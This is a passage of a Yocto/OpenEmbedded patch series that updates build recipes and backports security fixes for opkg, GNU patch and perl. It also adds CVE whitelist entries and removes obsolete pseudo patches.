file://0002-Add-debug-prefix-map-option.patch \
+ file://CVE-2022-44370.patch \
"
-SRC_URI[sha256sum] = "04e7343d9bf112bffa9fda86f6c7c8b120c2ccd700b882e2db9f57484b1bd778"
+SRC_URI[sha256sum] = "3c4b8339e5ab54b1bcb2316101f8985a5da50a3f9e504d43fa6f35668bee2fd0"
EXTRA_AUTORECONF_append = " -I autoconf/m4"
-inherit autotools
+inherit autotools-brokensep
BBCLASSEXTEND = "native"
diff --git a/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
index ba3398c5d6..755b73a173 100644
--- a/meta/recipes-devtools/ninja/ninja_1.10.0.bb
+++ b/meta/recipes-devtools/ninja/ninja_1.10.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "Ninja is a small build system with a focus on speed."
HOMEPAGE = "https://ninja-build.org/"
+DESCRIPTION = "Ninja is a small build system with a focus on speed. It differs from other build systems in two major respects: it is designed to have its input files generated by a higher-level build system, and it is designed to run builds as fast as possible."
LICENSE = "Apache-2.0"
LIC_FILES_CHKSUM = "file://COPYING;md5=a81586a64ad4e476c791cda7e2f2c52e"
@@ -7,7 +8,7 @@ DEPENDS = "re2c-native ninja-native"
SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f"
-SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release"
+SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https"
UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)"
S = "${WORKDIR}/git"
@@ -28,3 +29,6 @@ do_install() {
}
BBCLASSEXTEND = "native nativesdk"
+
+# This is a different Ninja
+CVE_CHECK_WHITELIST += "CVE-2021-4336"
diff --git a/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
new file mode 100644
index 0000000000..bec21e67f4
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch
@@ -0,0 +1,50 @@
+From 8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba Mon Sep 17 00:00:00 2001
+From: Jo-Philipp Wich <jo@mein.io>
+Date: Wed, 1 Apr 2020 21:47:40 +0200
+Subject: [PATCH 001/104] file_util.c: fix possible bad memory access in
+ file_read_line_alloc()
+
+In the case of a zero length string being returned by fgets(), the condition
+checking for a trailing new line would perform a bad memory access outside
+of `buf`. This might happen when line with a leading null byte is read.
+
+Avoid this case by checking that the string has a length of at least one
+byte. Also change the unsigned int types to size_t to store length values
+while we're at it.
+
+Upstream-Status: Backport [https://github.com/ndmsystems/opkg/commit/8b45a3c4cab95382beea1ecdddeb2e4a9ed14aba]
+
+Signed-off-by: Jo-Philipp Wich <jo@mein.io>
+Signed-off-by: Alejandro del Castillo <alejandro.delcastillo@ni.com>
+Signed-off-by: virendra thakur <virendrak@kpit.com>
+---
+ libopkg/file_util.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/libopkg/file_util.c b/libopkg/file_util.c
+index fbed7b4..ee9f59d 100644
+--- a/libopkg/file_util.c
++++ b/libopkg/file_util.c
+@@ -127,17 +127,14 @@ char *file_readlink_alloc(const char *file_name)
+ */
+ char *file_read_line_alloc(FILE * fp)
+ {
++ size_t buf_len, line_size;
+ char buf[BUFSIZ];
+- unsigned int buf_len;
+ char *line = NULL;
+- unsigned int line_size = 0;
+ int got_nl = 0;
+
+- buf[0] = '\0';
+-
+ while (fgets(buf, BUFSIZ, fp)) {
+ buf_len = strlen(buf);
+- if (buf[buf_len - 1] == '\n') {
++ if (buf_len > 0 && buf[buf_len - 1] == '\n') {
+ buf_len--;
+ buf[buf_len] = '\0';
+ got_nl = 1;
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
new file mode 100644
index 0000000000..4578fa33be
--- /dev/null
+++ b/meta/recipes-devtools/opkg/opkg/sourcedateepoch.patch
@@ -0,0 +1,24 @@
+Having CLEAN_DATE come from the current date doesn't allow for build
+reproducibility. Add the option of using SOURCE_DATE_EPOCH if set
+which for OE, it will be.
+
+Upstream-Status: Pending
+RP 2021/2/2
+
+Index: opkg-0.4.4/configure.ac
+===================================================================
+--- opkg-0.4.4.orig/configure.ac
++++ opkg-0.4.4/configure.ac
+@@ -281,7 +281,11 @@ AC_FUNC_UTIME_NULL
+ AC_FUNC_VPRINTF
+ AC_CHECK_FUNCS([memmove memset mkdir regcomp strchr strcspn strdup strerror strndup strrchr strstr strtol strtoul sysinfo utime])
+
+-CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++if ! test -z "$SOURCE_DATE_EPOCH" ; then
++ CLEAN_DATE=`LC_ALL=C date -d @$SOURCE_DATE_EPOCH +"%B %Y" | tr -d '\n'`
++else
++ CLEAN_DATE=`date +"%B %Y" | tr -d '\n'`
++fi
+
+ AC_SUBST([CLEAN_DATE])
+
diff --git a/meta/recipes-devtools/opkg/opkg_0.4.2.bb b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
index 66a74dc5ed..3ebc27c8ee 100644
--- a/meta/recipes-devtools/opkg/opkg_0.4.2.bb
+++ b/meta/recipes-devtools/opkg/opkg_0.4.2.bb
@@ -2,6 +2,7 @@ SUMMARY = "Open Package Manager"
SUMMARY_libopkg = "Open Package Manager library"
SECTION = "base"
HOMEPAGE = "http://code.google.com/p/opkg/"
+DESCRIPTION = "Opkg is a lightweight package management system based on Ipkg."
BUGTRACKER = "http://code.google.com/p/opkg/issues/list"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f \
@@ -14,6 +15,8 @@ PE = "1"
SRC_URI = "http://downloads.yoctoproject.org/releases/${BPN}/${BPN}-${PV}.tar.gz \
file://opkg.conf \
file://0001-opkg_conf-create-opkg.lock-in-run-instead-of-var-run.patch \
+ file://sourcedateepoch.patch \
+ file://0001-file_util.c-fix-possible-bad-memory-access-in-file_r.patch \
file://run-ptest \
"
@@ -48,7 +51,9 @@ EXTRA_OECONF_class-native = "--localstatedir=/${@os.path.relpath('${localstatedi
do_install_append () {
install -d ${D}${sysconfdir}/opkg
install -m 0644 ${WORKDIR}/opkg.conf ${D}${sysconfdir}/opkg/opkg.conf
- echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option lists_dir ${OPKGLIBDIR}/opkg/lists" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option info_dir ${OPKGLIBDIR}/opkg/info" >>${D}${sysconfdir}/opkg/opkg.conf
+ echo "option status_file ${OPKGLIBDIR}/opkg/status" >>${D}${sysconfdir}/opkg/opkg.conf
# We need to create the lock directory
install -d ${D}${OPKGLIBDIR}/opkg
diff --git a/meta/recipes-devtools/orc/orc_0.4.31.bb b/meta/recipes-devtools/orc/orc_0.4.31.bb
index cd4dc31d70..ba2c349c9f 100644
--- a/meta/recipes-devtools/orc/orc_0.4.31.bb
+++ b/meta/recipes-devtools/orc/orc_0.4.31.bb
@@ -1,5 +1,6 @@
SUMMARY = "Optimised Inner Loop Runtime Compiler"
HOMEPAGE = "http://gstreamer.freedesktop.org/modules/orc.html"
+DESCRIPTION = "Optimised Inner Loop Runtime Compiler is a Library and set of tools for compiling and executing SIMD assembly language-like programs that operate on arrays of data."
LICENSE = "BSD-2-Clause & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=1400bd9d09e8af56b9ec982b3d85797e"
diff --git a/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
new file mode 100644
index 0000000000..03988a179c
--- /dev/null
+++ b/meta/recipes-devtools/patch/patch/CVE-2019-20633.patch
@@ -0,0 +1,31 @@
+From 15b158db3ae11cb835f2eb8d2eb48e09d1a4af48 Mon Sep 17 00:00:00 2001
+From: Andreas Gruenbacher <agruen@gnu.org>
+Date: Mon, 15 Jul 2019 19:10:02 +0200
+Subject: Avoid invalid memory access in context format diffs
+
+* src/pch.c (another_hunk): Avoid invalid memory access in context format
+diffs.
+
+CVE: CVE-2019-20633
+Upstream-Status: Backport[https://git.savannah.gnu.org/cgit/patch.git/patch/?id=15b158db3ae11cb835f2eb8d2eb48e09d1a4af48]
+Signed-off-by: Scott Murray <scott.murray@konsulko.com>
+
+---
+ src/pch.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/src/pch.c b/src/pch.c
+index a500ad9..cb54e03 100644
+--- a/src/pch.c
++++ b/src/pch.c
+@@ -1328,6 +1328,7 @@ another_hunk (enum diff difftype, bool rev)
+ ptrn_prefix_context = context;
+ ptrn_suffix_context = context;
+ if (repl_beginning
++ || p_end <= 0
+ || (p_end
+ != p_ptrn_lines + 1 + (p_Char[p_end - 1] == '\n')))
+ {
+--
+cgit v1.2.1
+
diff --git a/meta/recipes-devtools/patch/patch_2.7.6.bb b/meta/recipes-devtools/patch/patch_2.7.6.bb
index b5897b357a..1997af0c25 100644
--- a/meta/recipes-devtools/patch/patch_2.7.6.bb
+++ b/meta/recipes-devtools/patch/patch_2.7.6.bb
@@ -10,6 +10,7 @@ SRC_URI += "file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://0001-Invoke-ed-directly-instead-of-using-the-shell.patch \
file://0001-Don-t-leak-temporary-file-on-failed-ed-style-patch.patch \
file://0001-Don-t-leak-temporary-file-on-failed-multi-file-ed.patch \
+ file://CVE-2019-20633.patch \
"
SRC_URI[md5sum] = "4c68cee989d83c87b00a3860bcd05600"
diff --git a/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
index 84e640773b..2bf3108f88 100644
--- a/meta/recipes-devtools/patchelf/patchelf_0.10.bb
+++ b/meta/recipes-devtools/patchelf/patchelf_0.10.bb
@@ -1,12 +1,15 @@
-SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \
+SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
+DESCRIPTION = "PatchELF is a simple utility for modifying existing ELF executables and libraries."
+HOMEPAGE = "https://github.com/NixOS/patchelf"
+
+LICENSE = "GPLv3"
+
+SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \
file://handle-read-only-files.patch \
file://fix-adjusting-startPage.patch \
file://fix-phdrs.patch \
"
-LICENSE = "GPLv3"
-SUMMARY = "Tool to allow editing of RPATH and interpreter fields in ELF binaries"
-
SRCREV = "e1e39f3639e39360ceebb2f7ed533cede4623070"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-31484.patch b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
new file mode 100644
index 0000000000..0fea7bf8a8
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-31484.patch
@@ -0,0 +1,27 @@
+CVE: CVE-2023-31484
+Upstream-Status: Backport [ import from Ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 9c98370287f4e709924aee7c58ef21c85289a7f0 Mon Sep 17 00:00:00 2001
+From: Stig Palmquist <git@stig.io>
+Date: Tue, 28 Feb 2023 11:54:06 +0100
+Subject: [PATCH] Add verify_SSL=>1 to HTTP::Tiny to verify https server
+ identity
+
+---
+ lib/CPAN/HTTP/Client.pm | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/cpan/CPAN/lib/CPAN/HTTP/Client.pm b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+index 4fc792c26..a616fee20 100644
+--- a/cpan/CPAN/lib/CPAN/HTTP/Client.pm
++++ b/cpan/CPAN/lib/CPAN/HTTP/Client.pm
+@@ -32,6 +32,7 @@ sub mirror {
+
+ my $want_proxy = $self->_want_proxy($uri);
+ my $http = HTTP::Tiny->new(
++ verify_SSL => 1,
+ $want_proxy ? (proxy => $self->{proxy}) : ()
+ );
+
diff --git a/meta/recipes-devtools/perl/files/CVE-2023-47038.patch b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
new file mode 100644
index 0000000000..59252c560c
--- /dev/null
+++ b/meta/recipes-devtools/perl/files/CVE-2023-47038.patch
@@ -0,0 +1,121 @@
+as per https://ubuntu.com/security/CVE-2023-47100 , CVE-2023-47100 is duplicate of CVE-2023-47038
+CVE: CVE-2023-47038 CVE-2023-47100
+Upstream-Status: Backport [ import from ubuntu perl_5.30.0-9ubuntu0.5
+upstream https://github.com/Perl/perl5/commit/12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+Backport of:
+
+From 12c313ce49b36160a7ca2e9b07ad5bd92ee4a010 Mon Sep 17 00:00:00 2001
+From: Karl Williamson <khw@cpan.org>
+Date: Sat, 9 Sep 2023 11:59:09 -0600
+Subject: [PATCH 1/2] Fix read/write past buffer end: perl-security#140
+
+A package name may be specified in a \p{...} regular expression
+construct. If unspecified, "utf8::" is assumed, which is the package
+all official Unicode properties are in. By specifying a different
+package, one can create a user-defined property with the same
+unqualified name as a Unicode one. Such a property is defined by a sub
+whose name begins with "Is" or "In", and if the sub wishes to refer to
+an official Unicode property, it must explicitly specify the "utf8::".
+S_parse_uniprop_string() is used to parse the interior of both \p{} and
+the user-defined sub lines.
+
+In S_parse_uniprop_string(), it parses the input "name" parameter,
+creating a modified copy, "lookup_name", malloc'ed with the same size as
+"name". The modifications are essentially to create a canonicalized
+version of the input, with such things as extraneous white-space
+stripped off. I found it convenient to strip off the package specifier
+"utf8::". To to so, the code simply pretends "lookup_name" begins just
+after the "utf8::", and adjusts various other values to compensate.
+However, it missed the adjustment of one required one.
+
+This is only a problem when the property name begins with "perl" and
+isn't "perlspace" nor "perlword". All such ones are undocumented
+internal properties.
+
+What happens in this case is that the input is reparsed with slightly
+different rules in effect as to what is legal versus illegal. The
+problem is that "lookup_name" no longer is pointing to its initial
+value, but "name" is. Thus the space allocated for filling "lookup_name"
+is now shorter than "name", and as this shortened "lookup_name" is
+filled by copying suitable portions of "name", the write can be to
+unallocated space.
+
+The solution is to skip the "utf8::" when reparsing "name". Then both
+"lookup_name" and "name" are effectively shortened by the same amount,
+and there is no going off the end.
+
+This commit also does white-space adjustment so that things align
+vertically for readability.
+
+This can be easily backported to earlier Perl releases.
+---
+ regcomp.c | 17 +++++++++++------
+ t/re/pat_advanced.t | 8 ++++++++
+ 2 files changed, 19 insertions(+), 6 deletions(-)
+
+--- a/regcomp.c
++++ b/regcomp.c
+@@ -22606,7 +22606,7 @@ Perl_parse_uniprop_string(pTHX_
+ * compile perl to know about them) */
+ bool is_nv_type = FALSE;
+
+- unsigned int i, j = 0;
++ unsigned int i = 0, i_zero = 0, j = 0;
+ int equals_pos = -1; /* Where the '=' is found, or negative if none */
+ int slash_pos = -1; /* Where the '/' is found, or negative if none */
+ int table_index = 0; /* The entry number for this property in the table
+@@ -22717,9 +22717,13 @@ Perl_parse_uniprop_string(pTHX_
+ * all of them are considered to be for that package. For the purposes of
+ * parsing the rest of the property, strip it off */
+ if (non_pkg_begin == STRLENs("utf8::") && memBEGINPs(name, name_len, "utf8::")) {
+- lookup_name += STRLENs("utf8::");
+- j -= STRLENs("utf8::");
+- equals_pos -= STRLENs("utf8::");
++ lookup_name += STRLENs("utf8::");
++ j -= STRLENs("utf8::");
++ equals_pos -= STRLENs("utf8::");
++ i_zero = STRLENs("utf8::"); /* When resetting 'i' to reparse
++ from the beginning, it has to be
++ set past what we're stripping
++ off */
+ }
+
+ /* Here, we are either done with the whole property name, if it was simple;
+@@ -22997,7 +23001,8 @@ Perl_parse_uniprop_string(pTHX_
+
+ /* We set the inputs back to 0 and the code below will reparse,
+ * using strict */
+- i = j = 0;
++ i = i_zero;
++ j = 0;
+ }
+ }
+
+@@ -23018,7 +23023,7 @@ Perl_parse_uniprop_string(pTHX_
+ * separates two digits */
+ if (cur == '_') {
+ if ( stricter
+- && ( i == 0 || (int) i == equals_pos || i == name_len- 1
++ && ( i == i_zero || (int) i == equals_pos || i == name_len- 1
+ || ! isDIGIT_A(name[i-1]) || ! isDIGIT_A(name[i+1])))
+ {
+ lookup_name[j++] = '_';
+--- a/t/re/pat_advanced.t
++++ b/t/re/pat_advanced.t
+@@ -2524,6 +2524,14 @@ EOF
+ "", {}, "*COMMIT caused positioning beyond EOS");
+ }
+
++ { # perl-security#140, read/write past buffer end
++ fresh_perl_like('qr/\p{utf8::perl x}/',
++ qr/Illegal user-defined property name "utf8::perl x" in regex/,
++ {}, "perl-security#140");
++ fresh_perl_is('qr/\p{utf8::_perl_surrogate}/', "",
++ {}, "perl-security#140");
++ }
++
+
+ # !!! NOTE that tests that aren't at all likely to crash perl should go
+ # a ways above, above these last ones. There's a comment there that, like
diff --git a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
index a6fd7b1c07..c91b44cd6e 100644
--- a/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
+++ b/meta/recipes-devtools/perl/libmodule-build-perl_0.4231.bb
@@ -37,6 +37,7 @@ EXTRA_CPAN_BUILD_FLAGS = "--create_packlist=0"
do_install_append () {
rm -rf ${D}${docdir}/perl/html
+ sed -i "s:^#!.*:#!/usr/bin/env perl:" ${D}${bindir}/config_data
}
do_install_ptest() {
diff --git a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
index bc154bbdc5..ef2b292352 100644
--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
chown -R root:root ${D}${PTEST_PATH}/samples
}
+RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
BBCLASSEXTEND="native nativesdk"
diff --git a/meta/recipes-devtools/perl/perl_5.30.1.bb b/meta/recipes-devtools/perl/perl_5.30.1.bb
index b53aff1216..bf81a023b8 100644
--- a/meta/recipes-devtools/perl/perl_5.30.1.bb
+++ b/meta/recipes-devtools/perl/perl_5.30.1.bb
@@ -1,5 +1,6 @@
SUMMARY = "Perl scripting language"
HOMEPAGE = "http://www.perl.org/"
+DESCRIPTION = "Perl is a highly capable, feature-rich programming language"
SECTION = "devel"
LICENSE = "Artistic-1.0 | GPL-1.0+"
LIC_FILES_CHKSUM = "file://Copying;md5=5b122a36d0f6dc55279a0ebc69f3c60b \
@@ -28,6 +29,8 @@ SRC_URI = "https://www.cpan.org/src/5.0/perl-${PV}.tar.gz;name=perl \
file://CVE-2020-10878_1.patch \
file://CVE-2020-10878_2.patch \
file://CVE-2020-12723.patch \
+ file://CVE-2023-31484.patch \
+ file://CVE-2023-47038.patch \
"
SRC_URI_append_class-native = " \
file://perl-configpm-switch.patch \
@@ -43,6 +46,10 @@ SRC_URI[perl-cross.sha256sum] = "edce0b0c2f725e2db3f203d6d8e9f3f7161256f5d159055
S = "${WORKDIR}/perl-${PV}"
+# This is windows only issue.
+# https://ubuntu.com/security/CVE-2023-47039
+CVE_CHECK_WHITELIST += "CVE-2023-47039"
+
inherit upstream-version-is-even update-alternatives
DEPENDS += "zlib virtual/crypt"
@@ -146,8 +153,9 @@ do_install() {
install lib/ExtUtils/typemap ${D}${libdir}/perl5/${PV}/ExtUtils/
# Fix up shared library
- rm ${D}/${libdir}/perl5/${PV}/*/CORE/libperl.so
- ln -sf ../../../../libperl.so.${PERL_LIB_VER} $(echo ${D}/${libdir}/perl5/${PV}/*/CORE)/libperl.so
+ dir=$(echo ${D}/${libdir}/perl5/${PV}/*/CORE)
+ rm $dir/libperl.so
+ ln -sf ../../../../libperl.so.${PERL_LIB_VER} $dir/libperl.so
}
do_install_append_class-target() {
diff --git a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
index 52ef2a9779..7bf68082b2 100644
--- a/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
+++ b/meta/recipes-devtools/pkgconfig/pkgconfig_git.bb
@@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
SRCREV = "edf8e6f0ea77ede073f07bff0d2ae1fc7a38103b"
PV = "0.29.2+git${SRCPV}"
-SRC_URI = "git://anongit.freedesktop.org/pkg-config \
+SRC_URI = "git://gitlab.freedesktop.org/pkg-config/pkg-config.git;branch=master;protocol=https \
file://pkg-config-esdk.in \
file://pkg-config-native.in \
file://fix-glib-configure-libtool-usage.patch \
diff --git a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch b/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
deleted file mode 100644
index f01e699de7..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-Add-statx.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From 4e41a05de1f34ba00a68ca4f20fb49c4d1cbd2d0 Mon Sep 17 00:00:00 2001
-From: Richard Purdie <richard.purdie@linuxfoundation.org>
-Date: Wed, 6 Nov 2019 12:17:46 +0000
-Subject: [PATCH] Add statx glibc/syscall support
-
-Modern distros (e.g. fedora30) are starting to use the new statx() syscall through
-the newly exposed glibc wrapper function in software like coreutils (e.g. the ls
-command). Add support to intercept this to pseudo.
-
-Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
-Upstream-Status: Submitted [Emailed to seebs]
----
- ports/linux/guts/statx.c | 48 ++++++++++++++++++++++++++++++++++++++++
- ports/linux/portdefs.h | 1 +
- ports/linux/wrapfuncs.in | 1 +
- 3 files changed, 50 insertions(+)
- create mode 100644 ports/linux/guts/statx.c
-
-diff --git a/ports/linux/statx/guts/statx.c b/ports/linux/statx/guts/statx.c
-new file mode 100644
-index 0000000..a3259c4
---- /dev/null
-+++ b/ports/linux/statx/guts/statx.c
-@@ -0,0 +1,42 @@
-+/*
-+ * Copyright (c) 2019 Linux Foundation
-+ * Author: Richard Purdie
-+ *
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ * int
-+ * statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf) {
-+ * int rc = -1;
-+ */
-+ pseudo_msg_t *msg;
-+ PSEUDO_STATBUF buf;
-+ int save_errno;
-+
-+ rc = real_statx(dirfd, pathname, flags, mask, statxbuf);
-+ save_errno = errno;
-+ if (rc == -1) {
-+ return rc;
-+ }
-+
-+ buf.st_uid = statxbuf->stx_uid;
-+ buf.st_gid = statxbuf->stx_gid;
-+ buf.st_dev = makedev(statxbuf->stx_dev_major, statxbuf->stx_dev_minor);
-+ buf.st_ino = statxbuf->stx_ino;
-+ buf.st_mode = statxbuf->stx_mode;
-+ buf.st_rdev = makedev(statxbuf->stx_rdev_major, statxbuf->stx_rdev_minor);
-+ buf.st_nlink = statxbuf->stx_nlink;
-+ msg = pseudo_client_op(OP_STAT, 0, -1, dirfd, pathname, &buf);
-+ if (msg && msg->result == RESULT_SUCCEED) {
-+ pseudo_debug(PDBGF_FILE, "statx(path %s), flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+ statxbuf->stx_uid = msg->uid;
-+ statxbuf->stx_gid = msg->gid;
-+ statxbuf->stx_mode = msg->mode;
-+ statxbuf->stx_rdev_major = major(msg->rdev);
-+ statxbuf->stx_rdev_minor = minor(msg->rdev);
-+ } else {
-+ pseudo_debug(PDBGF_FILE, "statx(path %s) failed, flags %o, stat rc %d, stat uid %o\n", pathname, flags, rc, statxbuf->stx_uid);
-+ }
-+ errno = save_errno;
-+/* return rc;
-+ * }
-+ */
-diff --git a/ports/linux/statx/portdefs.h b/ports/linux/statx/portdefs.h
-new file mode 100644
-index 0000000..bf934dc
---- /dev/null
-+++ b/ports/linux/statx/portdefs.h
-@@ -0,0 +1,6 @@
-+/*
-+ * SPDX-License-Identifier: LGPL-2.1-only
-+ *
-+ */
-+#include <sys/stat.h>
-+#include <sys/sysmacros.h>
-diff --git a/ports/linux/statx/wrapfuncs.in b/ports/linux/statx/wrapfuncs.in
-new file mode 100644
-index 0000000..c9cd4c3
---- /dev/null
-+++ b/ports/linux/statx/wrapfuncs.in
-@@ -0,0 +1 @@
-+int statx(int dirfd, const char *pathname, int flags, unsigned int mask, struct statx *statxbuf);
-diff --git a/ports/linux/subports b/ports/linux/subports
-index a29044a..49081bf 100755
---- a/ports/linux/subports
-+++ b/ports/linux/subports
-@@ -54,3 +54,13 @@ else
- fi
- rm -f dummy.c dummy.o
-
-+cat > dummy.c <<EOF
-+#define _GNU_SOURCE
-+#include <sys/stat.h>
-+struct statx x;
-+EOF
-+if ${CC} -c -o dummy.o dummy.c >/dev/null 2>&1; then
-+ echo "linux/statx"
-+fi
-+rm -f dummy.c dummy.o
-+
---
-2.17.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch b/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
deleted file mode 100644
index b2dbdad278..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-maketables-wrappers-use-Python-3.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From dbd34b1b2af8fbf44a0d5c37abe3448405819823 Mon Sep 17 00:00:00 2001
-From: Alexander Kanavin <alex.kanavin@gmail.com>
-Date: Wed, 28 Aug 2019 19:20:29 +0200
-Subject: [PATCH] maketables/wrappers: use Python 3
-
-Changelog indicates they should be compatible.
-
-Upstream-Status: Pending
-Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
----
- maketables | 2 +-
- makewrappers | 2 +-
- 2 files changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/maketables b/maketables
-index a211772..52285e2 100755
---- a/maketables
-+++ b/maketables
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2010, 2013 Wind River Systems, Inc.
- #
-diff --git a/makewrappers b/makewrappers
-index e84607d..b34f7eb 100755
---- a/makewrappers
-+++ b/makewrappers
-@@ -1,4 +1,4 @@
--#!/usr/bin/env python
-+#!/usr/bin/env python3
- #
- # Copyright (c) 2008-2011,2013 Wind River Systems, Inc.
- #
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
deleted file mode 100644
index 9c49e33b02..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo-On-a-DB-fixup-remove-files-that-do-not-exist-.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From b0902e36108b49e6bc88d6b251cc2f8cffcd5a13 Mon Sep 17 00:00:00 2001
-From: Ricardo Ribalda <ricardo@ribalda.com>
-Date: Sun, 5 Apr 2020 11:40:30 +0000
-Subject: [PATCH] pseudo: On a DB fixup remove files that do not exist anymore
-
-If the user decides to fix a database, remove the files that do not
-exist anymore.
-If only DB test is selected do not change the behaviour (return error).
-
-Signed-off-by: Ricardo Ribalda <ricardo@ribalda.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137045]
----
- pseudo.c | 13 ++++++++++---
- 1 file changed, 10 insertions(+), 3 deletions(-)
-
-diff --git a/pseudo.c b/pseudo.c
-index 0f5850e..98e5b0c 100644
---- a/pseudo.c
-+++ b/pseudo.c
-@@ -1087,9 +1087,15 @@ pseudo_db_check(int fix) {
- int fixup_needed = 0;
- pseudo_debug(PDBGF_DB, "Checking <%s>\n", m->path);
- if (lstat(m->path, &buf)) {
-- errors = EXIT_FAILURE;
-- pseudo_diag("can't stat <%s>\n", m->path);
-- continue;
-+ if (!fix) {
-+ pseudo_diag("can't stat <%s>\n", m->path);
-+ errors = EXIT_FAILURE;
-+ continue;
-+ } else {
-+ pseudo_debug(PDBGF_DB, "can't stat <%s>\n", m->path);
-+ fixup_needed = 2;
-+ goto do_fixup;
-+ }
- }
- /* can't check for device type mismatches, uid/gid, or
- * permissions, because those are the very things we
-@@ -1125,6 +1131,7 @@ pseudo_db_check(int fix) {
- S_ISDIR(m->mode));
- fixup_needed = 2;
- }
-+ do_fixup:
- if (fixup_needed) {
- /* in fixup mode, either delete (mismatches) or
- * correct (dev/ino).
---
-2.21.1
-
diff --git a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch b/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
deleted file mode 100644
index 33d4ef3b2f..0000000000
--- a/meta/recipes-devtools/pseudo/files/0001-pseudo_ipc.h-Fix-enum-typedef.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From a491aececfedf7313d29b80d626e0964fb533548 Mon Sep 17 00:00:00 2001
-From: Jacob Kroon <jacob.kroon@gmail.com>
-Date: Sun, 3 May 2020 06:24:03 +0200
-Subject: [PATCH] pseudo_ipc.h: Fix enum typedef
-
-'pseudo_access_t' is a type, so use typedef.
-
-Fixes building pseudo with gcc 10 where -fno-common is the default.
-
-Signed-off-by: Jacob Kroon <jacob.kroon@gmail.com>
-Upstream-Status: Submitted [https://lists.openembedded.org/g/openembedded-core/message/137758]
----
